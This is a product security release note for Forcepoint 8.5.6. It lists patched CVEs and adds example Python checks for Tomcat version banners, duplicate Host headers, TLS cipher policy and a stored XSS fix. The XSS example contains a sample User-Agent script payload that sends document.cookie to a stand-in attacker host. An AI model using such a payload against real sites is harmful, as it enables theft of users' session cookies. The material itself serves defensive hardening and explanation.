Security Updates

Forcepoint Security Labs analysts continually assess potential security vulnerabilities that can be introduced by third-party libraries. Security improvements have been made in several areas in version 8.5.6.

Updates and descriptions

Missing Oracle critical patch updates for Java. Java is upgraded to the latest version to fix the following CVEs, all published after release 1.8.0.242:
  • CVE-2020-14803
  • CVE-2021-23841
  • CVE-2021-3450
  • CVE-2021-2161
  • CVE-2021-2163
  • CVE-2020-14664
  • CVE-2020-14583
  • CVE-2020-14593
  • CVE-2020-14562
  • CVE-2020-14621
  • CVE-2020-14556
  • CVE-2020-14573
  • CVE-2020-14581
  • CVE-2020-14578
  • CVE-2020-14579
  • CVE-2020-14577
  • CVE-2020-14792
  • CVE-2020-14781
  • CVE-2020-14782
  • CVE-2020-14797
  • CVE-2020-14779
  • CVE-2020-14796
  • CVE-2020-14798
Apache Tomcat version disclosed on default error pages. Apache Tomcat running on the remote host reported its version number on its default error pages, which lets an attacker fingerprint the exact release and target its known vulnerabilities. To fix this issue, the default error pages are replaced with custom error pages that do not reveal the version number.
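Two checks a practitioner would want for this item, as an added example that is not Forcepoint's or Apache Tomcat's own code: an audit of a server.xml for Hosts whose default error pages still carry the version banner, and a check of a served error page body for that banner. Tomcat renders its default error pages with org.apache.catalina.valves.ErrorReportValve; a Host that declares no such Valve gets one with default settings, and the default prints "Apache Tomcat/<version>" at the foot of every error page. Setting showServerInfo="false" on the valve removes the banner (showReport="false" additionally drops the exception report); replacing the pages through web.xml error-page entries, as this release does, has the same visible effect, so the banner check applies either way. The server.xml fragments and 404 bodies below are constructed samples.

```python
"""Added example, not Forcepoint's or Apache Tomcat's code: find Tomcat Hosts
whose default error pages still print the server version, and detect the
banner in a served error page body.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

ERROR_VALVE = "org.apache.catalina.valves.ErrorReportValve"
VERSION_BANNER = re.compile(r"Apache Tomcat/(\d+(?:\.\d+)+)")

# Constructed sample: a stock server.xml Host with no ErrorReportValve declared.
DEFAULT_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>"""

# Constructed sample: the hardened Host, with the banner and stack trace disabled.
HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps">
        <Valve className="org.apache.catalina.valves.ErrorReportValve"
               showReport="false" showServerInfo="false" />
      </Host>
    </Engine>
  </Service>
</Server>"""

# Constructed 404 bodies: the stock Tomcat page with its banner, and a custom
# page that names neither product nor version.
STOCK_404_PAGE = ('<!doctype html><html><head><title>HTTP Status 404 - Not Found</title>'
                  '</head><body><h1>HTTP Status 404 - Not Found</h1><hr class="line" />'
                  '<h3>Apache Tomcat/9.0.70</h3></body></html>')
CUSTOM_404_PAGE = "<!doctype html><html><body><h1>Page not found</h1></body></html>"


def hosts_leaking_version(server_xml: str) -> List[str]:
    """Names of <Host> elements whose error pages would still carry the banner."""
    leaking = []
    for host in ET.fromstring(server_xml).iter("Host"):
        valves = [v for v in host.findall("Valve") if v.get("className") == ERROR_VALVE]
        if not valves:
            # No valve declared: Tomcat installs the default one, which shows server info.
            leaking.append(host.get("name", "?"))
            continue
        # The attribute defaults to true, so only an explicit "false" hides the banner.
        if any(v.get("showServerInfo", "true").lower() != "false" for v in valves):
            leaking.append(host.get("name", "?"))
    return leaking


def version_in_error_page(body: str) -> Optional[str]:
    """The Tomcat version printed in an error page body, or None if no banner is present."""
    match = VERSION_BANNER.search(body)
    return match.group(1) if match else None


if __name__ == "__main__":
    print("stock server.xml leaks on hosts:", hosts_leaking_version(DEFAULT_SERVER_XML))
    print("hardened server.xml leaks on hosts:", hosts_leaking_version(HARDENED_SERVER_XML))
    print("stock 404 page reveals:", version_in_error_page(STOCK_404_PAGE))
    print("custom 404 page reveals:", version_in_error_page(CUSTOM_404_PAGE))
```

To verify a running instance, request a path that does not exist and pass the response body to version_in_error_page; a result of None after the upgrade confirms the custom pages are in place for that Host.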
Apache ZooKeeper updated to latest. Apache ZooKeeper is upgraded to version 3.4.14 to fix the following vulnerabilities that affected the out-of-date version previously shipped:
  • CVE-2016-5017
  • CVE-2017-5637
  • CVE-2018-8012
  • CVE-2019-0201
Vulnerable version of plexus-utils (CASB). plexus-utils is upgraded to version 3.0.14 to fix CVE-2017-1000487. Note that the NVD entry for CVE-2017-1000487 lists versions before 3.0.16 as affected, so confirm the plexus-utils version actually present in the deployment.
Apache Tomcat Denial of Service (DoS) vulnerability. A vulnerability in Apache Tomcat allows a remote attacker to trigger a DoS. This issue is fixed by upgrading to Apache Tomcat 10.1.0-M6, 10.0.12, 9.0.54 or 8.5.72, or to the latest version of Apache Tomcat.
Host header handling via proxy. The proxy now restricts requests that carry multiple Host headers. RFC 7230 section 5.4 requires a server to answer any request containing more than one Host header, or an invalid Host value, with 400 Bad Request; when two values are accepted, the front end and the back end can disagree about which one names the target.
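One way a proxy can enforce that rule, as an added example that is not Forcepoint's proxy code: parse the request head, reject obs-fold continuation lines and whitespace before the colon (both of which RFC 7230 also says to reject, because they are classic ways of smuggling a second header past one parser), then require exactly one syntactically valid Host. The requests below are constructed samples, and treating an empty Host value as invalid is a policy choice of this example.

```python
"""Added example, not Forcepoint's proxy code: enforce exactly one valid Host
header per HTTP/1.1 request, answering 400 otherwise (RFC 7230 section 5.4).
"""
import re
from typing import List, Tuple

# host[:port]: a bracketed IP literal or a reg-name/IPv4 label (non-empty by policy here).
HOST_VALUE = re.compile(
    r"^(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?)(?::[0-9]{1,5})?$"
)

# Constructed sample requests.
OK_REQUEST = (b"GET /index.html HTTP/1.1\r\nHost: fsm.example.test:8443\r\n"
              b"User-Agent: curl/8.0\r\n\r\n")
DUPLICATE_HOST = (b"GET /index.html HTTP/1.1\r\nHost: fsm.example.test\r\n"
                  b"Host: attacker.test\r\n\r\n")
NO_HOST = b"GET /index.html HTTP/1.1\r\nUser-Agent: curl/8.0\r\n\r\n"
SPACE_BEFORE_COLON = b"GET / HTTP/1.1\r\nHost : fsm.example.test\r\n\r\n"


def parse_request_head(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split the head into the request line and (lower-cased name, value) pairs.
    Raises ValueError for obs-fold lines or whitespace between name and colon."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        if line[0] in " \t":
            raise ValueError("obs-fold continuation line")
        name, sep, value = line.partition(":")
        if not sep or not name or name != name.rstrip():
            raise ValueError("malformed header field")
        headers.append((name.lower(), value.strip(" \t")))
    return lines[0], headers


def check_host(raw: bytes) -> Tuple[int, str]:
    """Return (200, host) when the request is acceptable, else (400, reason)."""
    try:
        request_line, headers = parse_request_head(raw)
    except ValueError as exc:
        return 400, str(exc)
    hosts = [v for n, v in headers if n == "host"]
    if request_line.endswith(" HTTP/1.1") and not hosts:
        return 400, "HTTP/1.1 request without Host"
    if len(hosts) > 1:
        # Two Host values let a front end route on one and a back end on the other.
        return 400, f"{len(hosts)} Host headers in one request"
    if hosts and not HOST_VALUE.match(hosts[0]):
        return 400, "invalid Host value"
    return 200, hosts[0] if hosts else ""   # HTTP/1.0 may legitimately omit Host


if __name__ == "__main__":
    for label, req in (("ok", OK_REQUEST), ("duplicate", DUPLICATE_HOST),
                       ("missing", NO_HOST), ("space before colon", SPACE_BEFORE_COLON)):
        print(f"{label}: {check_host(req)}")
```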
Forcepoint deprecated TLS version and SSL/TLS cipher policy violation. Postgres listening on port 6432 on the Forcepoint Security Manager used deprecated TLS versions and SSL/TLS cipher suites that are not Forcepoint approved. This is addressed in version 8.5.6.
Apache Commons Text Java library vulnerable to RCE (CVE-2022-42889). The Apache Commons Text version specified in the CASB download for 8.5.5 is upgraded to the latest version to fix the RCE vulnerability CVE-2022-42889.
Multiple vulnerabilities in Apache 2.4.54.0. The Web Security Apache httpd version 2.4.54.0 is upgraded to Apache httpd 2.4.55 to fix multiple vulnerabilities in 2.4.54.0.
Apache vulnerabilities CVE-2023-25690 and CVE-2023-27522. Web Security Apache httpd version 2.4.55 or earlier is upgraded to Apache httpd 2.4.56 to fix CVE-2023-25690 and CVE-2023-27522.
Apache Tomcat 9.0.70 vulnerabilities. The previously bundled Apache Tomcat 9.0.70 was affected by the following CVEs:
  • CVE-2023-46589
  • CVE-2023-45648
  • CVE-2023-42795
  • CVE-2023-42794
  • CVE-2023-44487
  • CVE-2023-41080
  • CVE-2023-28708
Tomcat version 9.0.86 was sourced from the official Apache Tomcat site: https://tomcat.apache.org/index.html

All SWG references to Tomcat were updated to point to the new version.

All Tomcat server.xml files were updated to reflect SWG cipher restrictions and TLS standards.

Logjam on Port 55866.

The Logjam vulnerability (CVE-2015-4000) allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

The ciphers on port 55866 are now restricted to TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 and TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384. Logjam targets finite-field Diffie-Hellman (DHE) key exchange; the elliptic-curve ECDHE suites are not affected, and removing every DHE suite also removes the DHE_EXPORT suites that the downgrade relies on.
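A way to confirm that a cipher policy really excludes every DHE suite, covering both the port 55866 change here and the Postgres cipher-policy finding above, as an added example that is not Forcepoint's code: OpenSSL expands a cipher string into concrete suites, and Python's ssl module reports each suite's key exchange, so a policy can be audited offline without a handshake. The IANA-to-OpenSSL name mapping for the two suites is standard; the postgresql.conf fragments are constructed samples and assume the listener is configured through PostgreSQL's own ssl_* parameters (PostgreSQL 12 or later, where ssl_min_protocol_version exists).

```python
"""Added example, not Forcepoint's code: audit an OpenSSL cipher string for
non-ECDHE key exchange, then apply the same check to postgresql.conf.
"""
import re
import ssl
from typing import Dict, List, Tuple

# The two suites named in the release note, IANA name -> OpenSSL name.
IANA_TO_OPENSSL = {
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256": "ECDHE-RSA-AES128-GCM-SHA256",
    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384": "ECDHE-RSA-AES256-GCM-SHA384",
}
PORT_55866_POLICY = ":".join(IANA_TO_OPENSSL.values())


def resolve_policy(cipher_string: str) -> List[Dict]:
    """Concrete TLS 1.2-and-earlier suites OpenSSL would offer for this string.
    TLS 1.3 suites are skipped: their key exchange is chosen by supported_groups,
    not by the suite name, and OpenSSL reports them as kx-any."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.set_ciphers(cipher_string)
    return [c for c in ctx.get_ciphers() if c["protocol"] != "TLSv1.3"]


def audit_policy(cipher_string: str) -> Tuple[List[str], List[str]]:
    """(accepted suite names, findings). Any suite not using ECDHE is a finding:
    finite-field DHE is what Logjam downgrades, and static RSA key exchange has
    no forward secrecy at all."""
    accepted, findings = [], []
    for suite in resolve_policy(cipher_string):
        if suite["kea"] == "kx-ecdhe":
            accepted.append(suite["name"])
        else:
            findings.append(f'{suite["name"]}: key exchange {suite["kea"]}')
    return accepted, findings


# Constructed postgresql.conf fragments. The first keeps PostgreSQL's stock
# ssl_ciphers value and allows TLS 1.0; the second mirrors the port 55866 policy.
PG_CONF_BEFORE = """
ssl = on
ssl_min_protocol_version = 'TLSv1'
ssl_ciphers = 'HIGH:MEDIUM:+3DES:!aNULL'
"""
PG_CONF_AFTER = """
ssl = on
ssl_min_protocol_version = 'TLSv1.2'
ssl_ciphers = 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384'
"""
PG_SETTING = re.compile(r"^\s*(\w+)\s*=\s*'([^']*)'", re.MULTILINE)


def audit_postgres_conf(conf_text: str) -> List[str]:
    """Findings for deprecated protocol versions or non-ECDHE cipher suites."""
    settings = dict(PG_SETTING.findall(conf_text))
    findings = []
    if settings.get("ssl_min_protocol_version", "TLSv1.2") in ("TLSv1", "TLSv1.1"):
        findings.append("ssl_min_protocol_version allows deprecated TLS 1.0/1.1")
    _, cipher_findings = audit_policy(settings.get("ssl_ciphers", "HIGH:MEDIUM:+3DES:!aNULL"))
    return findings + cipher_findings


if __name__ == "__main__":
    print("port 55866 policy:", audit_policy(PORT_55866_POLICY))
    print("with a DHE suite added:", audit_policy("DHE-RSA-AES128-GCM-SHA256:" + PORT_55866_POLICY)[1])
    for label, conf in (("before", PG_CONF_BEFORE), ("after", PG_CONF_AFTER)):
        print(f"postgresql.conf {label}:", audit_postgres_conf(conf))
```

The expansion is done by the OpenSSL build Python is linked against, so run it on the host whose library the service actually uses; a suite that is compiled out there will simply not appear.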

Persistent Cross-Site Scripting via user agent field.

Cross-Site Scripting (XSS) is an attack in which an attacker injects malicious script into content served by a trusted application or website, so that the script runs in the browsers of other users of that site.

The Forcepoint Security Manager was vulnerable to stored XSS via the User-Agent field: the value is chosen by the end user's client, stored with the transaction, and displayed in the transaction viewer, where the viewing browser would interpret a crafted value as markup.

The XSS vulnerability was mitigated by HTML-encoding the User-Agent text before it is rendered. HTML encoding replaces the characters that carry meaning in HTML markup (<, >, &, and quotes) with entity references such as &lt;, &gt;, &amp; and &quot;, which the browser displays as the literal characters instead of interpreting them as markup. The encoding must match the output context: HTML-entity encoding protects element content and quoted attribute values, while data placed inside a script block or a URL needs the encoding appropriate to that context.
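The vulnerable rendering beside the encoded one, as an added example that is not Forcepoint's transaction-viewer code: a constructed transaction record with an attacker-chosen User-Agent is interpolated into a table row, first raw and then through html.escape, which is Python's standard-library HTML entity encoder. The row template and record are constructed samples.

```python
"""Added example, not Forcepoint's code: rendering a logged User-Agent into a
transaction-viewer row, raw interpolation beside the HTML-encoded fix.
"""
import html
import re
from typing import Dict

# Constructed transaction record. The User-Agent is whatever the client sent,
# so anyone whose traffic passes through the gateway chooses it freely.
RECORD = {
    "time": "2024-01-01T10:00:00Z",
    "user": "alice",
    "url": "http://www.example.test/",
    "user_agent": '<script>fetch("https://attacker.test/?c=" + document.cookie)</script>',
}

# Element body and a quoted attribute: the two contexts entity encoding covers.
ROW = ('<tr><td>{time}</td><td>{user}</td><td>{url}</td>'
       '<td title="{user_agent}">{user_agent}</td></tr>')


def render_row_vulnerable(rec: Dict[str, str]) -> str:
    """Raw interpolation: the browser parses the User-Agent as markup and runs it."""
    return ROW.format(**rec)


def render_row_encoded(rec: Dict[str, str]) -> str:
    """Entity-encode every field before interpolation. html.escape(quote=True)
    replaces & < > " ' with entity references, which is correct for element
    content and for the quoted title attribute. Every field is encoded, not just
    the one known to be hostile: the URL and user name are user-influenced too."""
    return ROW.format(**{k: html.escape(v, quote=True) for k, v in rec.items()})


SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def contains_script_tag(fragment: str) -> bool:
    """Crude check, used only to show which rendering lets a tag through."""
    return bool(SCRIPT_TAG.search(fragment))


if __name__ == "__main__":
    for label, render in (("vulnerable", render_row_vulnerable), ("encoded", render_row_encoded)):
        row = render(RECORD)
        print(f"{label}: script tag present = {contains_script_tag(row)}")
        print("  ", row)
```

Had the template put the User-Agent inside an inline event handler or a script block, entity encoding alone would not be enough; the fix described above is sufficient precisely because the transaction viewer renders the field as element text.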

For the basic hardware and software requirements for your system to use this product, see System requirements for this version in the Deployment and Installation Center.